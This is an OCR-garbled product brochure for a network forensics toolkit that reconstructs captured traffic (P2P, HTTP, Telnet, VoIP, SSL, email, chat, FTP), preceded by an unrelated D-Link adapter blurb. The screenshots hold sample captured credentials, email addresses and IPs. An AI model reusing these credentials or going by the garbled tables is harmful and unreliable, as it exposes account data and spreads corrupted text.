EXCEPTIONAL PERFORMANCE 
The D-Link? RangeBooster N® Notebook CardBus Adapter (DWA-642) is a draft 802.11n compliant wireless client for your notebook PC that delivers up to 12x 
faster speeds! and 4x farther range! than an 802.119 network while staying backward compatible with 802.119 networks. Once connected, you can share a 
high-speed Internet connection, photos, files, music, printers, and more. 


GET CONNECTED, STAY CONNECTED 

The RangeBooster N Notebook CardBus Adapter is powered by RangeBooster N technology to provide superb wireless performance in your home or office. 
Connectto a RangeBooster N Router (DIR-625) and experience smooth Internet phone calls (VoIP), responsive network gaming, secure Web surfing, faster file 
transfers, enhanced audio streaming, and greater wireless coverage in larger homes and offices!. The DWA-642 supports WPA™ and WPA2™ encryption that 
allow you to connect securely to a wireless network. 


EASY TO SETUP, EASY TO USE 

D-Link’s Quick Adapter Setup Wizard guides you step-by-step through the installation process. Configure this notebook adapter without having to call a 
networking expert to help you. The D-Link Wireless Manager is also included with this product to keep track of your most frequently accessed networks so that 
you can join them quickly and easily. 

With unmatched wireless performance, reception, and security protection, the D-Link RangeBooster N Notebook CardBus Adapter (DWA-842) is a great choice 
for easily adding or upgrading wireless connectivity to your notebook PC. 


@ Unknown Zone | Protected Mode: Off ty 


Sample : File Transfer (P2P File Sharing Log) 


Case Results 


` Import Record | Build Backup ISO | 


Case Management | Import Analysis Auto Import Analysis | User Management | System Setup | Download or Burn ISO Logout | 


Case Name: default > Raw Data Import Filter : N/A 


e 
REPORT E-MAIL CHAT [FILE TRANSFER] GAME HTTP TELNET VOIP SSL FUNCTION eg 
KR Every Page :[ ll Confirm | 
No Date-Time Account Tool File Name Last Activated Send Receive Detail 
Throughput Throughput 
2009-06-18 . 2009-06-18 z 
12. 42140-56 192.168.1.142 Foxy 1.9.8.0 04.Hero - Mariah Carey.mp3... 12-10:56 0B 1.90K Detail 
2008-09-22 Les á " 2008-09-22 : 
11 09-56-50 192.168.1.142 Foxy 1.9.8.0 KE ARE Bi Hero Ys Come B... 09-58-42 0B 5.26M Detail 
2008-09-22 — we ee š 2008-09-22 ; 
, 3 H Si 
10. *oo.56:24 192-168.1.142 Foxy 1.9.8.0 Ress sLET-Hero-Mariah Carey.mp3 09:59:56 0B 8.58M Detail 
2008-09-22 "m 2008-09-22 : 
Y A I-HER... 
9. logg; 192.168.1.142 Foxy 1.9.8.0 4 H5¢-Can You Keep A Secret(H &I-HER 09-57-03 0B 6.427 Detail 
a. 0080TA? 192.168.1.10 Foxy 1.9.8.0 HEV. HEEN gr 4.63M 0B Detail 
e H * hi .92.168.1.12/general/common/show_m: ? PROG- ) msg.php& IDX-10&T SQL1-Select?620 - Windows Interne T HEH | 
7, 2008-09-22 495 168.4142 BitToren Aren ee? A 07M Detail 
09:39:31 
2008-09-22 : - " —— > 
6. 09:38-12 192.168.1.142 BitTorrent m PETTE a s First... |. Previous | |ua Next 13K Detail 
- 09. P = e —— — " z Every Page : 
5 pa 192 168.1.10 Foxy 1.9.8 = Date-Time: 2008-09-22 09:56:24 | IP: 192.168.1.142. | File Name: Xij-Hero-Mariah Carey.mp3 21M Detail 
d No Date-Time Action PAP Port P-Port js] 
4. 2008-09-22 192 168.1.10 Foxy 1 oa 1. 2008-09-22 09:56:24 Download 122 124.6.143 51573 6407 491B| ||]11M_ Detail 
09:55:01 2 2008-09-22 09:56:24 Download 122.124 6.143 51576 6407 492B 
3 2008-09-22 192 168.1.33 Foxy 1.9.8|| 3. 2008-09-22 09:56:24 Download 118.161.244.30 51579 11243 545B| ||| 31K Detail 
03:54:13 4. 2008-09-22 09:56:24 Download 59.125.156.64 51578 6019 3.29K 
WA 12 br | s. 2008-09-22 09:56:46 Download 61.59 238.168 51615 6503 479B rent Page 1 
6. 2008-09-22 09:56:50 Download 118.161.209.155 51612 4901 523.23K 
rA 2008-09-22 09:57:04 Download 60.250.100.76 51635 9446 515.31K 
8. 2008-09-22 09:57-04 Download 203.222 42.58 51680 5081 512.50K | 
9. 2008-09-22 09:57:08 Download 61.229 222.3 51685 5751 950B ` 
« 123 »» Sx DECEM d uU USE Total 24 Total Page 3 Current Page 1 
Done @ Internet | Protected Mode: Off Zä Q10% ~ 


Sample : HTTP (Web Reconstruct) 


Case Results Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 


| https://192.168.1.12/general/common/show_msg php? PROG-htip/dynamic msg phpac IDK  SQL1-Sel - Windows Internet Explorer 


` Import Record | Build Backup ISO | 


e 
REPORT E-MAIL CHAT FILE TRANSFER GAME[HTTP|TELNET VOIP SSL FUNCTION | Kë? 


Content 
[3 http'//www.dlink.com.sg/support/support_detail.asp 
[3 http://www.dlink.com.sg/support 
EF) http'//sg.news.yahoo.com/ap/20090618/twl-brazil-plane-1be00c... 
[3 http-//ads.yimg.dom/hb/i/sg/adv/test/sg m ysm iframe 2008090... 
[3 http://sg-news.y@hoo.com/afp/20090617/tap-entertainment-sing... 


547 http://sg news.yahoo.com/ap/20090618/twl-brazil-plane-1be00ca html 


Case Name: default ~ Raw Data Import Filter: N/A 
No. Date-Time Account 
549. 2009-06-18 12:22:36 192.168.1.11 
548. 2009-06-18 12:22:24 192.168.1.11 
547. 2009-06-18 12:21:24 192.168.1.11 
546. 2009-06-18 12:12:11 192.168.1.11 
545. 2009-06-18 12:12:10 192.168.1.11 
544. 2009-06-18 12:12:02 
543. 2009-06-18 12:11:45 
542. 2009-06-18 12:11:43 "YAHOO! news 
541. 2009-06-18 12:11:42 Sign new Use? Sign Up 
540. 2009-06-18 12:11:42 E 

i W« 123456789 bh 


Autopsies suggest Air France jet broke up in sky 


MOST POPULAR - WORLD 
Viewed 
Men's ‘stiff upper lip may 
explain cancer death rate 
Climate change is 
happening 'here, now: US 
report 


Airbus a big winner at 
Paris Air Show 


Obama signs note for girl 
who played hooky to see 
him 


Court orders Exxon to pay 
$507.5 mln for 1989 spill 
View Complete List » 


| iframe... 


(Web Search| 


090506.h.. 


Total 549 Total Page 55 Current Page 1 


^P - Thursday, June 18By STAN LEHMAN and EMMA VANDORE Associated Press Writers 

SAO PAULO - Autopsies have revealed fractures in the legs, hips and arms of Air France 

disaster victims, injuries that _ coupled with the large pieces of wreckage pulled from the 

Atlantic _ strongly suggest the plane broke up in the air, experts said Wednesday. 
ADVERTISEMENT. 


€» 


Learn more and give 
Search Monkey a try 


@ Internet | Protected Mode: Off 


Sample : HTTP (Download/Upload) 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name: default > Raw Data Import Filter: N/A D Import Record | Build Backup ISO | 


e 
REPORT E-MAIL CHAT FILE TRANSFER GAME[HTTP|TELNET VOIP SSL FUNCTION KE? 
No. ` Date Time Account Action File Name EE URL E= 
Name Size 
2008-09-22 I i ae . . 
224. 09-19-06 192.168.1.9 Download E] flower.zip zip http-//c icq.com/xtraz2/img/flower/flower zip 4.04K 
223. ` 192.168.1.9 Download EJ avatar.zip zip http://c.icq.com/xtraz2/img/avatar/avatar zip 4.50K 
222 or 192.168.1.9 Download H backgammon.zip zip http://c icq.com/xtraz2/img/backgammon/backgammon.zip 5.57K 
2008-09-22 I š : http-//webmail.seed.net tw/UploadAttachment.do? 
221 09-18-39 192.168.1.10 Upload H 60160 01 PP jpg jpg webmailkey=20 414.53K 
2008-09-22 š . http://webmail.seed_net.tw/UploadAttachment.do? 
220. 09-18-39 192.168.1.10 Upload 60X160_01_PP jpg Jpg webmailkey=20. 0B 
-09- - i ? 
219. eei 192 168.1.10 Upload FJ 60X160 | htt webmail. seed.net.tw/UploadAttachment.do? 53B 
218 2008-09-22 Lic Downlond — vu 60X160 Qm et tw/UploadAttachment.do? 0B 
09:18:39 Do you want to open or save this file? ~ 
2008-09-22 = GEES E Pt tw/UploadAttachment.do? 
217. 09:48:39 E pe MPEG Image tt FJ 60X160 H 0B 


IK« 910 1112 13 14 MY sess Total 320 Total Page 40 Current Page 13 


(oen JL ze J [ Gesi J 


| | While files from the Intemet can be useful, some files can potentially 
e harm your computer. f you do not trust the source, do not open or 
save this file. What's the risk? 


Sample: HTTP (FLV Video Streaming) 


Case Management Import Analysis Auto Import Analysis | User Management System Setup Download or Burn ISO Logout 


Case Name: default > Raw Data Import Filter: N/A 


FF Video Stream 


352. 
351. 


350. 
i«« 12345 bh 


Date-Time 


2009-06-18 
12:10:56 
2008-09-22 
10:06:07 
2008-09-22 
10:06:07 
2008-09-22 
09:48:54 
2008-09-22 
09:48:54 
2008-09-22 
09:46:53 
2008-09-22 
09:46:53 
2008-09-22 
09:46:15 


M Import Record Build Backup ISO 


Account 


192.168.10.10 


192.168.1.33 


192 .168 1.33 


192.168.1.33 


192.168.1.33 


192.168.1.33 


192.168.1.33 


192.168.1.33 


HOST 
v.mccont.com 
203.66.48.101 

youtube.com 
203.66.48.36 


youtube.com 


203.66.48.36 


REPORT E-MAIL CHAT FILE TRANSFER GAME [HTTP [TELNET vOIP SSL FUNCTION 


File Name 


iHTTPVIDEO _Ir2IpB flv 


4HTTPVIDEO  kjeXsc flv 


+Gnomish engineer underwater ro... 


+HTTPVIDEO_QgNOZE flv 


VERA Blt ah A 


| 
File 
LEL Size 
http://v.mccont.com/ItemFiles/%5BFrom%20www.metacafe.com% 
g 589.30K 
5D%... 
http://203.66.48.101/youtube/4/Go2F g4xSE2c?ivit-9196&origina. 1.00M 
http://tw_youtube.com/watch?v=Go2F g4xSE2c&feature-related 1.00M 
http://203.66.48.36/youtube/1/X3 VPQhlyno?ivit-8149&original. 2.60M 
http://tw.youtube.com/watch?v=X3_VPQhlyno&NR=1 2.60M 
http://203.66.48.36/youtube/1/4e7N5Ppkr7g?ivit28033&original... 2.41M 
youtube.com/watch?v=4e7N5Ppkr7g&NR=1 2.41M 


H | 00:10 wawww 


@ Internet | Protected Mode: Off 


— 03.66.48.100/youtube/4/w3i8c VwNMKkE ?ivit=8005&origina... 984.61K 


Total 37 Total Page 5 Current Page 1 


[L case Resuts_] Case Management || Import Analysis_|_Auto Import Analysis | User Management | System Setup | Download or Bum iSO | Logout | 


Case Name: default ~ Raw Data Import Filter: N/A 


Belnet 
No. Date-Time Account 
“4 12 bhi 


= ae 


REPORT E-MAIL CHAT FILE TRANSFER GAME HTTP|TELNET | v 


YOIP SSL FUNCTION 


Usei Password Server 

guest 140.112.172.11 

guest 140.113.17.154 
[B[B[B[B[B[B[B[B[B[B[B[B[B[B[B y 140.112.172.11 
[Cdoiecisionboss jmyohxbc 140.112.172.11 
OBOBOBOBOBOBOBOBOBOBOBOB 140.112.172.11 
guest 140.113.30.91 

lafa188 lafa1965 140.112.172.11 

new yes 140.112.172.11 
SEET TEES 

ara eral s Certificate Eror | > | 


7 TELNET_85621bcb0e41c8c9 dat [= Eusu...] | Previous... 


(SSN St 


Next... [.... Last... | Bookmark 


P Play |» Fast] 


Done @ Internet | Protected Mode: Off 


A, 


Every Page:| J E 


Record File 

4.62K 

22.68K 

38.62K 

95.75K 

4.89K 

32.31K 
121.37K 
189.66K 

otal 13 Total Page 2 Current Page 1 


Sample: VoIP SIP/H.323 RTP Voice Calls 


Case Management| Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name: default > Raw Data Import Filter: N/A ` Import Record Build Backup ISO 


» 
REPORT E-MAIL CHAT FILE TRANSFER GAME HTTP TELNET [vorP|ssL FUNCTION | Q 
[9 vorP]| upload EveryPage:| j| Confirm | 
NO. Date-Time Account Caller Callee Mode Type Codec File Name Time 
12 HI ` 192.168.6.8 8610044407 — E8610000104 peer to peer SIP G723  |VOIP hyFW9c.wav 8 Sec 
11. ET 60.250.163.131 8610044407 — 8610000104 peer to peer SIP G723 1 VOIP_bvidJi.wav 8 Sec 
10. TT 192.168.6.8 8610044407 — — &8610000104 peer to peer SIP G723 1 VOIP_ItPNjo.wav 8 Sec 
9 oop] 60.280.163.131 8610044407 8610000104 peer to peer SIP G723 1 VOIP_x00mWt.wav 9 Sec 
8 ooo}. 19246868 8610044407 «48610000104 peer to peer SIP G723  |VOIP M5JSAz wav 10 Sec 
7 TTT 60250463431 B8640044407 — 8610000104 peer to peer SIP G723 1 VOIP GD wav 11 Sec 
e 20090611 9246868 8610044407 — 88610000104 peer to peer SIP G723 1 VffP_ew6d6K wav 8 Sec 
5 ' to p= = — XSQ.wav 8 Sec 
File Download — 
“4 12) P 


Page 2 Current Page 1 
Do you want to open or save this file? 


° x n Name: 8610044407 8610000104.wav 
WAV. Type: Wave Sound, 556 bytes 
From: 192.168.1.12 


| za While files from the Intemet can be useful, some files can potentially 
[2] ham your computer. If you do not trust the source, do not open or 
save this file. What's the risk ? 


Sample: HTTPS/SSL Traffic 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name: default ~ Raw Data Import Filter: N/A X Import Record | Build Backup ISO | 


REPORT E-MAIL CHAT FILE TRANSFER GAME HTTP TELNET voOIP[SSL FUNCTION e i 

SSL " Every Page :| s][ Confirm 

No Date-Time Account Client-IP Server-IP SC File Name Bytes 
Hae c 192.468.1.11 192168111 1921681200 — 443 € SS| ENC 3232235787 43203 1245299812 1245301317 2.75K 
um — 2009 06 8 192.468 1.11 192168111 1921681200 443 € ssi ENG 3232235787 43189 1245299802 1245301317 2.75K 
Wu E 192. 168.1.11 192168111 1921681200 443 @SSL_ENC_3232235787_43187_1245299792_ 1245301317 2.75K 
Hk UT 192.168.111 192168.111 1921681200 — 443 GSS| ENC 3232235787 43184 1245299782 1245301317 2.75K 
$i E 192.168.1.1 192168111 4924684120 — 443 @SSL_ENC 3232235787 43179 1245299772 1245301317 2.75K 
(d OD 192. 168.1.11 192168.111 1921681200 443 G ssi ENC 323955787 43177. 1245299762 1245301317 2.75K 
we ` 192.168.1.11 192168111 — 1492468420 — 443 @SSL_ENC 532235787. 43175 1245299752 1245301317 2.75K 
win To 192.468 1.11 192168111 1921681200 — 443 G ssi ENG 3232235787 43173 1245299742 1245301317 2.75K 


iW « 123456789 bh Total 11,185 Total Page 1,399 Current Page 1 


X 
=P Upload Key File 


Certificate File : 


Upload | 


SSL Private Key is required to decrypt the SSL encrypted content. 


User Management Features 


Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management System Setup | Download or Burn ISO | Logout | 

Group User Authority Stare Function 

N/A admin Admin 2009-03-20 11:40:56 Modify Password odify Authority | Modify Priority Case Visibility 

N/A decision1 Analyst 2009-06-19 15:46:49 Delete | Modify Password dify Authority | Modify Priority Case Visibility 

N/A decision2 Analyst 2009-06-19 15:50:15 Delete | Modify Password | MN ; Authority | Modify Priority Case Visibility 
default default Group Admin 2009-03-20 11:40:56 elete | Modify Password / Modify Priority Cz 
default decision user1 User 2009-06-19 15:50:40 Delete | Modify Password | Modify Authority | Modify Priority | Case Visibility | 

decision_group1 decision_group1 Group Admin 2009-06-19 15:51:41 Delete | Modify Password | Modify Authority | Modify Priority Case Visibility 
Visible Cage List 
Case Name Read Write Modify 


Create New User 


* Authority : N/A ` 
“user: id 
‘Pasw Deet 
* Confirm Password GW 


* Priority : normal v 


Submit 


note : * is the required field 


Case Management Features 


Case Results I[c Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 


Creation Case 
Date-Time Name 


20090320 default defaut admin of 


Creator Path Function 


Modify Priority | Imported Record Query Result 


Delete 


11:40:56 

ee. ¿xs 1 Case! in oA D C Modify | Modify Priori R Query R 
16-11-13 decision_group1 Case1 admin idatas/rawdata import/cases/d: Delete lear odify odify Priority | Imported Record uery Result 
C decision group1 Case2 admin Q [/datas/rawdata import/cases/di Delete Clear | Modify | Modify Priority | Imported Record | Query Result 


Create New Case 


16:11:27 


Raw Data Imported History Raw Data Imported List 
p A User Case Name Tag Name File Delete | File Date-Time File Source Import File 
Date-Time 
X 


Create Case Name 


"Case Wame "ll 


“Case PathName:[ — | 


* Group : M 


* Priority ` normal v 


Submit 


Note : * is the required field 


Importing PCAP for Analysis & Reconstruction 


Case Results | Case Management | Import Analysis Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 


File Source : Group default Y Case default v Path: /datas/rawdata_import/cases/default/default/ 
El File Name File Date-Time File Size Function 
EI HTTP VIDEO METACAFE. pcap 2009-06-16 09:55:55 2.0MB 
T HTTP_VIDEO_YOUTUBE.pcap 2009-06-16 09:53:02 8.4MB 
EI SAMPLE. pcap 2008-07-02 10:47:25 TTMB 
EI raw 1 2008-10-13 09:45:26 12MB 
EI raw 10 2008-10-13 09:47:44 2.9MB 
[7] raw 11 2008-10-13 09:48:04 1.4MB 
E raw 12 2008-10-13 09:48:16 14MB 
EI raw 13 2008-10-13 09:48:26 1.2MB 
EI raw 14 2008-10-13 09:48:32 2.2MB 
[7] raw 15 2008-10-13 09:48:36 284KB 
EI raw 16 2008-10-13 09:48:40 1.4MB 
EI raw 17 2008-10-13 09:48:46 4.3MB 
EI raw 18 2008-10-13 09:48:50 8.1MB 
Oo raw_19 2008-10-13 09:48:56 7.0MB 
(a raw 2 2008-10-13 09:45:44 5.7MB 
a raw 20 2008-10-13 09:49:04 87MB e Name 
EI raw 21 2008-10-13 09:49:12 76KB e Name 
m raw 22 2008-10-13 09:49:16 476KB Delete _ | Name | 


Tag Name : 2009-06-19 16:17:17 File-Time : From [ $ ER v To (E — vis HB T Analyze Log 


Reconstructed Data Export/Backup 


Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name : default ~ Raw Data Import Filter: N/A Import Record | [ Build Backup ISO | | Build Backup ISO | Backup ISO 


CATEGORY 

ALL V & POP3 (z Š sMTP 2 $9 IMAP 

&à Webmail(Read) [V] (& Webmail (Sent) "o s MSN vj Bo 

39 YAHOO g) @ aa (v| UT UT Chatroom [V] © SKYPE 

"8" GOOGLETALK 2 IRC IRC Chatroom v; € FTP o £P pop 

& Online Game 2 ® HTTP Link (V; @ HTTP Content W Á HTTP Upload/Download 
@) HTTP Reconstruct [Z| dÉ video Stream (v| G&S Telnet ™ vi vorP 

8 ssL 


Case Results | Case Management Import Analysis Auto Import Analysis | User Management | 


System Setup 


Download or Burn ISO Logout | 


Network Setup/ System Backup/ Port Setting/ Update System Time / System Reboot/PowerOff/ Upgrade / Registration 
Screen will refresh 14 s 
Queue i 


= — wm Every Page dl Confirm | 


Job ID Date/T ime | Prority Subject Owner Function 
23 2009-06-19 16:37:17 222 Export in Case : default admin Ea Step | 
Wal bh x Tota Page al Page T Current Page 1 
Job Subject : Export in Case : default 
Job Status : 


030 2009-06-19 16:38:05 INFO DECODING 

eddc mkexport : Backup starting - 18 $ 
030 2009-06-19 16:38:05 INFO DECODING 

eddc_mkexport : Backup starting - 18 & 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 $ 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 $ 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 $% 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 $ 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 % 
030 2009-06-19 16:38:06 INFO DECODING 

eddc_mkexport : Backup starting - 18 $% 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 $ 


Offline Packet Reconstruction Series 
Forensics Investigation Toolkit (FIT) 


m 
aZ 


Xp Windows Vista 


A 


Introduction to Forensics Investigation Toolkit (FIT) 


| Offline Raw Data Files (PCAP) Decoding and 


Reconstruction Tool 
= = ser < Academic 
— N T Version also 
š: Available 
Internet & Network Traffic Content Analysis (Network Administrator) 


Auditing of Internet & Network Traffics (Network Administrator) 


Solution for: 


* 
Ze 


\ 
Ze 
* 
Ze 


Network Forensics Analysis and Investigation (Government & LEA) 


Forensics Investigation Toolkit (FIT) is a Windows based Application Software 


suitable for all group of users to analyze and forensically investigate on the 
content of Internet/network raw data files captured. 


Compatible with: 
Fëmmen Internet Content 
Där: Py Ca Analysis and 
Hy xp k e "y Reconstruction 
' Windows Vista 


Windows'7 


Forensics Investigation Toolkit Application 


LAN - ex: eth0..123..pcap 


m eth0..456..pcap 


ENEE 


- ex: wifi0..123..pcap 
wifi0..456..pcap 


Internet Raw Data 
PCAP format (LAN 


Administrator 
Officers 


" 
* AM 
e à 
MM! 
At 
M 
^ M 


Compatible with: — | 


SS. E sa 


Forensics Investigation Toolkit (FIT) 


Sample: Email (POP3, SMTP and IMAP) 


4} Network Forensics Analysis Toolkit 
: File Edit View Case Management Tool Window Help 


LP" A, 
dacci st Ch — rop |S SMTP -x 
ZIP EE d i 
= E-Mail Source IP Source MAC Destination IP Sender Receiver | CC | sub body si^ 
POPS [33] ç [] 11/5/2009 5:34:54 PM |192.168.1.10 00:0e:a6:55:ec:c9 199.175.252.15 |1218ms...  vic@deci... Bandwidth Monito... | 
IMAP [6] F] (11/5/2009 5:34:54 PM _|192.168.1.10 00:0e:a68:55:ec:c9 139.175.252.15 decision... vic@deci..| Fwd: @igt—test | 34 
SNE , -] 11/5/2008 5:34:54 PM |192.168.1.10 | 00:0e:38:55:ec:c8 |138.175.252.15 decision... vic@deci... Fwd: B82 3 
WebMail(Send) [47] E 11/5/2008 5:34:54 PM | 192.168.1.10 |00:0e:a6:55:ec:c9 139.175.252.15 — rickwang... | vic@deci... [Bug 2287]-?UTF... | 
oa CHAT O (9/10/2009 11:11:56 AM | 192.168.1.190 | 00:0a:e4:Od:cO:d8 | 220.130.119.240 decision ... decision... Hi, This is a test ... 1,82 
MSN [3] [] 9/10/2009 11:11:56 AM | 192.168.1.190 |00:0a:e4:0d:c0:d8 | 220.130.119.240 decision ... decision... Hi, This is a test ... 48 
ICQ [1] [] 9/10/2008 11:11:56 AM |192.168.1.180 |00:0a:e4:0d:cO:d8 | 220.130.119 240 decision. ... decision1... | Hi, This is a test ... 5 
YAHOO [3] E 9/10/2009 11:11:58 AM 192.188.1.190 00:0a:e4:0d:c0:d8 |220.130.118.240 decision ..|decisionl..| Hi This is atest.. | 57 
. [1] oO (8/10/2009 11:11:56 AM 192.168.1.190 00:0a:e4:0d:c0:d8 (220.130.119.240 (decision ... decisioni... Hi, This is a test ... | 
UT Chatroom [1] L] (9/10/2009 11:11:56 AM | 182.168.1.180 00:0a:e4:0d:cÜ:d8 |220.130.119.240 |decision_... decisio TTE 
GoogleTalk [2] z [1 |annaonna 11:11:55 AM 192 1AA 1 190 na e4: Adee NAA 220 130 119 240. i derisinn derisini 
< > 


(nto? can 866-830-6479) 
cam 3216800 u; 


` em SC 


` 


Detailed Information 


Detail (conteng 
mg 


name.com + Google 


Every domain name now comes 
Google 


Mail Server's address: 220.130.119.240 Hostname Query Whois Google Map ' 


Detail Whois Source Code 


Hi, This is a test mail 38! 
Dä Return-Path: <decision_test@yam.com> 
decision_test@yam.com Content -Original-To: decision123@pchome.com tw 
2009/09/10 (Thursday) 11* Delivered-To: decision123@pchome.com.tw 
Received: from mx18.pchome.com.tw (mx16.pchome.com tw (220.130.119.229) 
by ms64.pchome.com tw (Postfix) with ESMTP id 662CODCS569024 
for <decision123@pchome.com.tw>; Wed, 9 Sep 2009 17:13:55 +0800 (CST) 


Received: from localhost (localhost [127 .0.0.1]) 
hv rel Ro nochnarma corn ha: (Dactfivi with EQMTD id DOE EOF A ET 


Detail Content VVhois 


decision] 23@pchome.com.tw 


Sample: Webmail — Yahoo Mail, Gmail, Hotmail etc... 


4 Network Forensics Analysis Toolkit 


mail | Hotmail 


: File Edit View Case Management Tool Window Help 


Peg byGoogle 
TS a WebMail Received +x 
EE 
= E-Mail Sk Datetirne Source IP Source MAC Destination IP Sender Receiver | CC sub 
POP3 [33] O |11/2/2008 10:03:29 AM | 182.168.1.202 |00:0& E4:0D: CO: D8 | 72.14.203.18 decisioner... decisione... u8906260... 333333333333... 
IMAP [6] E] 11/2/2008 10:03:29 AM |182.188.1.202 |00:0A:E4:0D:C0:D8 7241420348 —  emailconfir.. decisione... |u8906250... | Please confir... 
BEE , | WI 11/2/2009 10:03:29 AM | 192.168.1.202 | :C0:D8 | 72.14.203.18 welcome... decisione... |u8908250... Welcome to Li... 
WebMail(Send) [47] L] 11/2/2008 10:03:28 AM | 192.168.1.202 DI: QA E4:0D: CH D8 | 72.14.203.18 |decision@... decisione... (48906250... [Fwd:Fwd:Fw: ... | 
3 CHAT L1 | 11/2/2008 10:03:28 AM | 192.168.1.202 00: DA:E4:0D:CO0:D8 |72.14.203.18 | decision... | decisione... u8906250... atieseednet... 
MSN [3] O (11/2/2009 10:03:28 AM | 192.168.1.202 |00:0A:E4:0D:C0:D8 | 72.14.203.18 decision12... decisione... |decision12... FW. pchorne1... 
ICQ [1] E 11/2/2009 10:03:30 AM |192.168.1.202 DO:DA:E4:DD:C0:DB 72.14.203.18 |121@msa.... decisione... |decision12... des BUE Ed 
YAHOO [3] [l 11/2/2009 10:03:30 AM |192.168.1.202 |00:DA:E4:0D:C0:D8 | 72.14 203.18 EE |decision12... Total Through... 
acd d oO (11/2/2009 10:03:30 AM | 192.168.1.202 |00:0A:E4:0D:C0:D8 (72.14.203.18 121@msa.... ‘decisi i isi E 
UT Chatroom [1] E (11/2/2008 10:03:30 AM | 182.188.1202 | 00:0A:E4:0D:C0:D8 7214420348 | vio@decisi... de 
GoogleTalk [2] z o 11/2/2009 10:03:30 AM | 192.168.1.202 (00:0A:E4:0D:C0:D8 72.14.203.18  frankie@d. . |de 
< P 11/2/2009 10: 03:30 AM 132 158.1 202 | DU DA EA 0D: CO: DB | 18 | 


Detai E whos XGauce Cod) Detailed Information 
ee 

ender: welcome DO er ir 
WG 


Seotent Source Code 


— | eee Receiver. decisionerGgmal seg! web Mail Sen Be E Address: 72.14.203.18 [ Hostname Query || “nos |[ Google Map = 
Web Mail Server's Hostyqme: mail.google.com | Hostname Query | Whois | Google Map H d 


Content Whois 


Detail ——- Source Code 


Welcome to LinkedIn! 
We da CMM com Content 
end Date: — 2009/11/02 (Monday) 10:03 


Receiver decisioner@gmail.com 


Detail 


href=". /image/gmail_css1.css"><link rel="stylesheet" type="text/css" href=". /image/gmail css2.css"» «/head» «body bgcolor=#4 
ellpadding=0 cellspacing=0 border=0 align=center class=h><tr><td><h2><font size= 1><b>VVelcome to Linkedln!«/b» «/font» «. 
] Bee cellspacing-0 border=0 Bulls AE name="?"></a> <table width=100 — 


-- Sample: IM -Yahoo, MSN, ICQ, IRC, QQ etc... ` 


Lë Network Forensics Analysis Toolkit [x] 
File Edit View Case Management Tool Window Help 
LA 2 = 
MSN Xx 
= CHAT 
n : E : Chat Session 
can] iH Captured Time Source IP Source MAC Destination IP Chat Session Owner Participator 
YAHOO [3] rm | | | | | : 
SEE 7 11/5/2008 5:34:08 PM (192.168.1.10 (00:0e:a6:55:ec:c9 0.0.0.0 diesiscàmsB2.hinet.net | ugly158@hotmail.com H 
UT Chatroom [1] 10/30/2008 11:12:28 AM |192.168.1.203 |00:0e:a6:55:ec:c8 |0.0.0.0 decision test(hotmail.com | shmily.d0613@msa.hinet.net Ü 
GoogleTalk [2] 
IRC Chatroom [1] 
= File Transfer 


6/15/2009 2:03:53 PM diesis@yrms5B2.hinet.net 
6/15/2009 2:04:53 PM | decision test(àhotmail.com 
6/15/2009 2:05:42 PM decision test(hotmail.com with text me 
6/15/2009 2:05:57 PM decision_test@hotmail.com file transfer 
6/15/2009 2:06:00 PM decision_test@hotmail.com video Messages 
6/15/2009 2:06:07 PM decision_test@hotmail.com and voice call 


nas? hinet n 


Detailed Information 
Captured Time: 2009/06/15 (Monday) 14:02 


Chat Session Owner: decision testiahotmail.com 


Chat Session 


diesis@ms62 hinet.net 


Sample: File Transfer — FTP Upload/Download 


: File Edit View Case Management Tool Window Help 
D* "t 2 > 
Object List ° » FTP ors 
IRC Chatroom [1] 
= Sa) šE Captured Time Source MAC Source IP Destination IP EE Transfered File Maps 
P2P [B] | = (6/15/2009 3:21:21 PM 00:0e:a6:39:47:43 |192.1B8.1.33 |192.168.1.248 /192.168.1.249 DiagnosticCD_ED2-1-10-2.iso | 16197612 
z TELNET O 6/15/2009 3:24:46 PM | 00:0e:a6:39:47:43 | 182.168.1.33 | 192.168.1.249 | 192.168.1.249 DiagnosticCD ED2-1-10-2.iso | 15695696 
Telnet [1] O |8/15/2008 3:21:21 PM |00:0e:a6:39:47:43 | 182.168.1.33 | 192.168.1.249 192.168.1248 DiagnosticCD ED2-1-10-2.iso | 18197512 
= HTTP | 6/15/2009 3:24:46 PM 00:0e:a6:39:47:43 192.168.1.33 |182.168.1.248 192.168.1.249 DiagnosticCD_ED2-1-10-2.iso | 15695696 
HTTP Content [580] 
UTTO I InlandiMevanlasd 
< 
) C TX) 
Detail 


Detailed Information 


| | Capuae: 2009/06/15 (Monday) 15:21 
| | Source MAC: D&dgo6:384743 
User's IP Address: 192.168.1.33 

FTP Server's IP Address: 192.168.1.249 o 


FTP Login Password: 203154 


Premum Domains Avaliable tor Purchase at name eom (nio? cat 666-830-6479) 
Maam $4388.00 Mati com $3188.00 3178800 Masi com $2088 


TLD avatav 


name.com + Google 


Every domain name now comes. 
with select Google Apps FREE! 


-> Sample: File Transfer — P2P File Sharing " 
| | 


£ Network Forensics Analysis Toolkit 
File Edit View Case Management Tool Window Help 
> _ eg = 
5 P2P P2P e x 
IRC Chatroom [1] 
E Kee Jm Captured Time Source MAC Source IP Destination IP Last Activated Time P2P Tool Transfered File 
I 9/10/2009 11:25:45 AM | 00:0a:e4:0d:c0:d8 | 192.168.1.180 0.0.0.0 8/10/2008 11:26:14 AM |Foxy 18.8.0 |Foxy.1.8.9.TC.Setup[1] 
3 TELNET J 1 l 37 A , am 
